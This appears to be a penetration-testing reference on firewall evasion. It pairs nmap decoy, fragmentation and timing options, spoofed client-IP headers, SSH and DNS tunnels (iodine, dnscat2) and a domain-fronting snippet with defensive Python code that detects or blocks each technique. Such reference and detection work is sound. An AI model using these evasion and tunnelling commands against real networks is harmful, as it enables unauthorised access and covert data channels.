Firewall Evasion

Bypassing network security controls and detection systems

Firewall Detection

Identifying Firewall Presence

# Nmap firewall detection (ACK, FIN and NULL probes show whether a stateful filter sits in the path)
nmap -sA target.com
nmap -sF target.com
nmap -sN target.com

# TTL manipulation
nmap --ttl 64 target.com

# Fragmentation
nmap -f target.com
nmap -ff target.com

# Decoy scanning
nmap -D RND:10 target.com
nmap -D decoy1,decoy2,decoy3,ME target.com

Traffic Obfuscation Techniques

Protocol Manipulation

# Source port manipulation (relies on stateless rules that trust a source port such as DNS or HTTP)
nmap --source-port 53 target.com
nmap --source-port 80 target.com

# Zombie scan (idle scan)
nmap -sI zombie-host target.com

# FTP bounce scan
nmap -b ftp-relay target.com
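The source-port trick works only against a filter that decides by port numbers alone. The following added example (not part of the original page) contrasts a constructed stateless rule table with a connection-tracking filter: the real DNS reply passes both, while a probe sent from source port 53 passes the stateless rules and is dropped by the stateful one. All addresses, ports and rule entries are constructed values.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False   # connection-opening flag (TCP only; UDP records leave it False)
    ack: bool = False


# Weak, stateless ruleset: "let DNS and web replies in" expressed purely as a
# source-port match. A scanner that sets --source-port 53 matches rule 1.
STATELESS_RULES = [
    ("allow", {"sport": 53}),
    ("allow", {"sport": 80}),
    ("allow", {"dport": 443}),
    ("deny", {}),
]


def stateless_verdict(pkt: Packet) -> str:
    """First-match evaluation of the stateless table."""
    for verdict, match in STATELESS_RULES:
        if all(getattr(pkt, field) == value for field, value in match.items()):
            return verdict
    return "deny"


class StatefulFilter:
    """Connection-tracking filter: inbound packets are admitted only if they
    answer a flow the inside host opened, or open a listed exposed service."""

    def __init__(self, exposed_ports):
        self.exposed_ports = set(exposed_ports)
        self.flows = set()   # (remote_ip, remote_port, local_ip, local_port)

    def note_outbound(self, pkt: Packet) -> None:
        self.flows.add((pkt.dst, pkt.dport, pkt.src, pkt.sport))

    def inbound_verdict(self, pkt: Packet) -> str:
        if (pkt.src, pkt.sport, pkt.dst, pkt.dport) in self.flows:
            return "allow"        # reply to something the inside host sent
        if pkt.syn and not pkt.ack and pkt.dport in self.exposed_ports:
            return "allow"        # new connection to a service we mean to expose
        return "deny"


def compare(inside="10.0.0.5", resolver="192.0.2.53", scanner="198.51.100.7"):
    """Return (stateless, stateful) verdicts for a genuine DNS reply and for a
    --source-port 53 probe aimed at port 22. Addresses are constructed."""
    fw = StatefulFilter(exposed_ports={443})
    fw.note_outbound(Packet(inside, 40001, resolver, 53))        # inside host asks the resolver
    dns_reply = Packet(resolver, 53, inside, 40001)               # the resolver's answer
    probe = Packet(scanner, 53, inside, 22, syn=True)             # scanner SYN with sport 53
    return {
        "dns_reply": (stateless_verdict(dns_reply), fw.inbound_verdict(dns_reply)),
        "probe": (stateless_verdict(probe), fw.inbound_verdict(probe)),
    }


if __name__ == "__main__":
    for name, (stateless, stateful) in compare().items():
        print(f"{name:10s} stateless={stateless:5s} stateful={stateful}")
```

The fix on a real border device is the same as in the toy: replace "allow from source port 53" with a rule that only admits packets matching an established or related connection, and list exposed services explicitly by destination port.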

Timing Evasion

# Slow scanning
nmap -T0 target.com   # Paranoid
nmap -T1 target.com   # Sneaky

# Custom timing
nmap --scan-delay 5s target.com
nmap --max-rate 50 target.com
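On the detection side, the flag-based probes from the Firewall Detection section above and the slow timing options here call for two different checks: a per-packet signature for flag combinations no real connection uses (NULL, FIN, Xmas), and a long sliding window that counts distinct destination ports per source, since a per-second rate rule never trips on one probe every five seconds. The detector below is an added example, not code from the page; the packet log it runs on is constructed.

```python
from collections import defaultdict
from typing import Optional


def flag_signature(flags: str) -> Optional[str]:
    """Classify a packet by its TCP flags (tcpdump letters: S A F R P U).
    Legitimate connections never start with these combinations, so a single
    such packet from an outside host is a probe."""
    f = set(flags)
    if not f:
        return "null-scan"
    if f == {"F"}:
        return "fin-scan"
    if f == {"F", "P", "U"}:
        return "xmas-scan"
    return None


def detect_scans(records, window_s=600, port_threshold=10):
    """records: iterable of (ts_seconds, src_ip, dst_port, flags).
    Returns a sorted list of (src_ip, alert) pairs."""
    alerts = set()
    by_src = defaultdict(list)
    for ts, src, dport, flags in records:
        sig = flag_signature(flags)
        if sig:
            alerts.add((src, sig))
        by_src[src].append((ts, dport))
    for src, events in by_src.items():
        events.sort()
        lo = 0
        live = defaultdict(int)          # dst_port -> packets inside the window
        for ts, dport in events:
            live[dport] += 1
            while events[lo][0] < ts - window_s:   # expire events older than the window
                old = events[lo][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                lo += 1
            if len(live) > port_threshold:
                alerts.add((src, "portscan"))
                break
    return sorted(alerts)


def sample_records():
    """Constructed packet log: a scanner probing one port every 5 s (the
    --scan-delay 5s case), one NULL probe, and a browser hammering port 443."""
    recs = [(5.0 * i, "203.0.113.9", 1 + i, "S") for i in range(12)]   # 12 ports over 55 s
    recs.append((30.0, "203.0.113.10", 22, ""))                           # NULL-scan packet
    recs += [(0.1 * i, "10.0.0.2", 443, "S") for i in range(40)]         # normal client
    return recs


if __name__ == "__main__":
    for src, alert in detect_scans(sample_records()):
        print(f"{src:15s} {alert}")
```

Running the same log with a one-second window reports only the NULL probe: the slow scanner falls below threshold, which is exactly what -T0 and --scan-delay are designed to achieve against short-window thresholds.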

Packet Fragmentation

# IPv4 fragmentation
nmap -f target.com

# Maximum fragmentation (8-byte fragments, the same as -f)
nmap --mtu 8 target.com

# Custom MTU (must be a multiple of 8)
nmap --mtu 16 target.com
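Tiny fragments defeat a filter that inspects each fragment on its own, because the first 8 bytes of a TCP segment do not even contain the flags the filter wants to match. The added example below (not from the page) parses raw IPv4 headers, reassembles fragments per datagram, and reports the conditions an inspection point should reject or reassemble before filtering: a first fragment shorter than a TCP header, overlapping fragments, and gaps. The helper that splits a payload into fragments and the SYN segment it splits are constructed for the demonstration.

```python
import ipaddress
import struct
from collections import defaultdict

IPV4_HDR = struct.Struct("!BBHHHBBH4s4s")   # fixed 20-byte header, no options
TCP_HEADER_LEN = 20


def parse_ipv4(raw: bytes) -> dict:
    """Decode the fields needed for fragment handling from a raw IPv4 packet."""
    (vihl, _tos, total_len, ident, flags_off, _ttl, proto, _csum,
     src, dst) = IPV4_HDR.unpack_from(raw)
    ihl = (vihl & 0x0F) * 4
    return {
        "id": ident,
        "proto": proto,
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "mf": bool(flags_off & 0x2000),          # More Fragments bit
        "offset": (flags_off & 0x1FFF) * 8,      # fragment offset in bytes
        "payload": raw[ihl:total_len],
    }


def build_fragments(payload: bytes, frag_size: int, ident=0x1234, proto=6,
                    src="198.51.100.7", dst="10.0.0.5") -> list:
    """Constructed helper: split a transport-layer payload into IPv4 fragments
    of frag_size bytes, as nmap --mtu <frag_size> does (multiple of 8)."""
    assert frag_size % 8 == 0
    frags = []
    for off in range(0, len(payload), frag_size):
        chunk = payload[off:off + frag_size]
        mf = 0x2000 if off + frag_size < len(payload) else 0
        hdr = IPV4_HDR.pack(0x45, 0, 20 + len(chunk), ident, mf | (off // 8), 64,
                            proto, 0, ipaddress.IPv4Address(src).packed,
                            ipaddress.IPv4Address(dst).packed)
        frags.append(hdr + chunk)
    return frags


def analyze(packets) -> tuple:
    """Group fragments per datagram, reassemble them, and report the cases a
    port-based stateless filter gets wrong: a first fragment too short to hold
    the TCP ports and flags, overlapping fragments, and gaps."""
    groups = defaultdict(list)
    for raw in packets:
        p = parse_ipv4(raw)
        if p["mf"] or p["offset"]:
            groups[(p["src"], p["dst"], p["id"], p["proto"])].append(p)
    reassembled, findings = {}, []
    for key, frags in groups.items():
        frags.sort(key=lambda f: f["offset"])
        first = frags[0]
        if first["offset"] == 0 and len(first["payload"]) < TCP_HEADER_LEN:
            findings.append((key, "tiny-first-fragment", len(first["payload"])))
        buf, end = bytearray(), 0
        for f in frags:
            if f["offset"] < end:
                findings.append((key, "overlapping-fragment", f["offset"]))
            elif f["offset"] > end:
                findings.append((key, "gap", f["offset"]))
                buf.extend(b"\x00" * (f["offset"] - end))
            buf[f["offset"]:f["offset"] + len(f["payload"])] = f["payload"]   # later data wins on overlap
            end = max(end, f["offset"] + len(f["payload"]))
        reassembled[key] = bytes(buf)
    return reassembled, findings


def demo(frag_size: int = 8):
    """Constructed TCP SYN to port 22 (20-byte header plus 12 bytes of options),
    fragmented at frag_size. Returns (reassembly matched, finding names)."""
    tcp = struct.pack("!HHIIBBHHH", 40001, 22, 1, 0, 0x50, 0x02, 65535, 0, 0) + bytes(12)
    reassembled, findings = analyze(build_fragments(tcp, frag_size))
    return list(reassembled.values()) == [tcp], [f[1] for f in findings]


if __name__ == "__main__":
    for size in (8, 16, 24):
        print(f"--mtu {size}: reassembled={demo(size)[0]} findings={demo(size)[1]}")
```

With 8- and 16-byte fragments the first fragment is flagged; at 24 bytes the destination port and flags are visible in the first fragment and nothing is reported. A filter that reassembles before matching, or drops first fragments shorter than the transport header, closes this gap.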

Application Layer Evasion

HTTP Evasion Techniques

# User-Agent manipulation
curl -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" http://target.com

# Request method obfuscation
curl -X OPTIONS http://target.com
curl -X TRACE http://target.com

# HTTP header manipulation (spoofed client-address headers)
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com
curl -H "X-Real-IP: 192.168.1.1" http://target.com
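The X-Forwarded-For and X-Real-IP headers only carry weight because some applications trust them from any TCP peer. The added example below (not code from the page) shows the vulnerable client-address lookup next to a hardened one that accepts the header only from its own reverse proxies and reads the hop list from the right. The trusted proxy range and the requests are constructed values.

```python
import ipaddress

# Constructed: the address range our own reverse proxies connect from.
TRUSTED_PROXIES = [ipaddress.ip_network("10.10.0.0/24")]


def _is_trusted(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_vulnerable(peer_ip: str, headers: dict) -> str:
    """Believes X-Forwarded-For from anyone: a header of 127.0.0.1 sent
    straight from the internet makes the caller look like localhost."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip


def client_ip_hardened(peer_ip: str, headers: dict) -> str:
    """Trusts X-Forwarded-For only when the TCP peer is one of our proxies,
    and reads the list from the right: the first address that is not one of
    our proxies is the hop that connected to them. Anything further left was
    supplied by the client and is ignored."""
    peer = ipaddress.ip_address(peer_ip)
    if not _is_trusted(peer):
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer_ip           # malformed header: do not guess, use the socket address
        if not _is_trusted(addr):
            return str(addr)
    return peer_ip


def admin_allowed(peer_ip: str, headers: dict, resolver=client_ip_hardened) -> bool:
    """Loopback-only admin check, parameterised by the address resolver in use."""
    return ipaddress.ip_address(resolver(peer_ip, headers)).is_loopback


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    print("vulnerable:", client_ip_vulnerable("203.0.113.9", spoof))
    print("hardened:  ", client_ip_hardened("203.0.113.9", spoof))
```

The same rule applies to X-Real-IP and any similar header: the proxy that terminates the client connection should overwrite it, and the application should refuse it from any other peer.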

DNS Evasion

# DNS over HTTPS
curl -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=target.com&type=A"

# DNS over TLS (dig +tls requires BIND 9.18 or later)
dig @1.1.1.1 target.com +tls

# Alternative DNS servers
dig @8.8.8.8 target.com
dig @1.1.1.1 target.com
dig @208.67.222.222 target.com

Tunneling & Proxying

SSH Tunneling

# Local port forward
ssh -L 8080:target.com:80 user@jump-server

# Remote port forward
ssh -R 4444:localhost:22 user@remote-server

# Dynamic port forward (SOCKS proxy)
ssh -D 1080 user@proxy-server

# Using proxychains with the SSH tunnel (SOCKS carries TCP connections only, so a full connect scan is required)
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT target.com

HTTP Proxying

# Manual proxy with curl
curl --proxy http://proxy-server:8080 http://target.com

# Tor proxy via proxychains
proxychains4 -f /etc/proxychains4.conf curl http://target.com

DNS Tunneling

# iodine DNS tunnel (the server takes the tunnel network address as its first argument; 10.0.0.1 is an example value)
iodined -f -c -P password 10.0.0.1 tunnel.yourdomain.com
iodine -f -P password tunnel.yourdomain.com

# dnscat2 (server, then client)
ruby dnscat2.rb tunnel.yourdomain.com
./dnscat --dns server=tunnel.yourdomain.com
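Tunnels like iodine and dnscat2 leave a distinctive footprint in resolver logs: a high volume of queries under one domain, almost every query name unique, long or high-entropy encoded labels, and heavy use of record types that carry bulk data (NULL, TXT, CNAME, MX). The detector below is an added example, not code from the page or from either project; it runs over a constructed query log with one tunnelling host and one host browsing normally. The thresholds are starting points to be tuned on real traffic.

```python
import math
import random
from collections import defaultdict

TUNNEL_QTYPES = {"NULL", "TXT", "CNAME", "MX"}   # record types DNS tunnels use for bulk data


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Naive split into (encoded prefix, registrable domain) using the last two
    labels; production code would consult a public-suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    return "".join(labels[:-2]), ".".join(labels[-2:])


def analyze_dns(records, min_queries=20, min_prefix_len=30, min_entropy=3.5, min_unique=0.9):
    """records: iterable of (client_ip, qname, qtype). Returns per-(client, domain)
    statistics and the keys flagged as likely tunnels: many queries, nearly every
    name unique, and prefixes that are long or high-entropy."""
    groups = defaultdict(list)
    for client, qname, qtype in records:
        prefix, domain = split_name(qname)
        groups[(client, domain)].append((prefix, qtype.upper()))
    stats, flagged = {}, []
    for key, items in groups.items():
        prefixes = [p for p, _ in items]
        st = {
            "queries": len(items),
            "unique_ratio": len(set(prefixes)) / len(items),
            "mean_prefix_len": sum(map(len, prefixes)) / len(items),
            "mean_entropy": sum(map(entropy, prefixes)) / len(items),
            "bulk_qtype_share": sum(q in TUNNEL_QTYPES for _, q in items) / len(items),
        }
        stats[key] = st
        if (st["queries"] >= min_queries and st["unique_ratio"] >= min_unique
                and (st["mean_prefix_len"] >= min_prefix_len or st["mean_entropy"] >= min_entropy)):
            flagged.append(key)
    return stats, flagged


def sample_records(n=30, seed=7):
    """Constructed log: one host moving data through a tunnel domain, one host
    resolving ordinary web names."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyz234567"          # base32-style encoding alphabet
    tunnel = [("10.0.0.8",
               "".join(rng.choice(alphabet) for _ in range(40)) + ".tunnel.example.net",
               rng.choice(["NULL", "TXT"])) for _ in range(n)]
    normal_names = ["www.example.com", "mail.example.com", "cdn.example.com", "api.example.com"]
    normal = [("10.0.0.9", rng.choice(normal_names), "A") for _ in range(n)]
    return tunnel + normal


if __name__ == "__main__":
    stats, flagged = analyze_dns(sample_records())
    for key, st in stats.items():
        mark = "TUNNEL?" if key in flagged else "ok"
        print(f"{key[0]:10s} {key[1]:15s} q={st['queries']:3d} uniq={st['unique_ratio']:.2f} "
              f"len={st['mean_prefix_len']:.1f} H={st['mean_entropy']:.2f} bulk={st['bulk_qtype_share']:.2f} {mark}")
```

Note that the DNS-over-HTTPS and DNS-over-TLS commands in the DNS Evasion section take queries off the resolver log entirely; this detector only sees what passes through a resolver you control, which is one reason to force internal clients through it and block direct access to external resolvers.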

Advanced Evasion Techniques

Domain Fronting

import requests

# The TLS connection (and its SNI) names allowed-cdn.com; the HTTP Host header inside it names the site actually requested.
headers = {
    'Host': 'forbidden-site.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}
response = requests.get('https://allowed-cdn.com/api/endpoint', headers=headers)
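Domain fronting depends on the edge accepting a Host header that differs from the TLS server name. The added example below (not from the page) shows both halves of the countermeasure: a front-end decision that answers 421 Misdirected Request when the Host is not one the connection's SNI is configured to serve, and a log sweep that uses the same policy to surface existing mismatches. The SNI-to-host policy and the log records are constructed.

```python
# Constructed: which HTTP Host names each TLS server name (SNI) is permitted to serve.
ALLOWED_HOSTS_BY_SNI = {
    "allowed-cdn.com": {"allowed-cdn.com", "www.allowed-cdn.com"},
    "api.example.com": {"api.example.com"},
}


def normalise(name: str) -> str:
    """Strip port, trailing dot and case so Host and SNI compare cleanly."""
    return name.split(":")[0].strip().rstrip(".").lower()


def check_request(sni: str, host: str, policy=ALLOWED_HOSTS_BY_SNI):
    """Front-end decision: return (status, reason). 421 Misdirected Request is
    the HTTP status for a Host that the connection's TLS identity does not serve."""
    sni_n, host_n = normalise(sni), normalise(host)
    allowed = policy.get(sni_n)
    if allowed is None:
        return 421, "unknown-sni"
    if host_n not in allowed:
        return 421, "host-sni-mismatch"
    return 200, "ok"


def fronting_findings(records, policy=ALLOWED_HOSTS_BY_SNI):
    """Detection over proxy logs: each record is a dict with client, sni and host
    (the host is visible after TLS termination or at the origin)."""
    findings = []
    for rec in records:
        status, reason = check_request(rec["sni"], rec["host"], policy)
        if status != 200:
            findings.append((rec["client"], normalise(rec["sni"]), normalise(rec["host"]), reason))
    return findings


def sample_log():
    """Constructed proxy log entries."""
    return [
        {"client": "10.0.0.8", "sni": "allowed-cdn.com", "host": "forbidden-site.com"},
        {"client": "10.0.0.9", "sni": "allowed-cdn.com", "host": "www.allowed-cdn.com"},
        {"client": "10.0.0.9", "sni": "api.example.com", "host": "api.example.com:443"},
        {"client": "10.0.0.10", "sni": "cdn.other.net", "host": "cdn.other.net"},
    ]


if __name__ == "__main__":
    for client, sni, host, reason in fronting_findings(sample_log()):
        print(f"{client:10s} sni={sni:18s} host={host:22s} {reason}")
```

On the network side the same comparison is only possible where TLS is terminated or decrypted; an outbound proxy that sees only the ClientHello can log the SNI but cannot see the Host header, which is why the check belongs at the CDN edge or the origin.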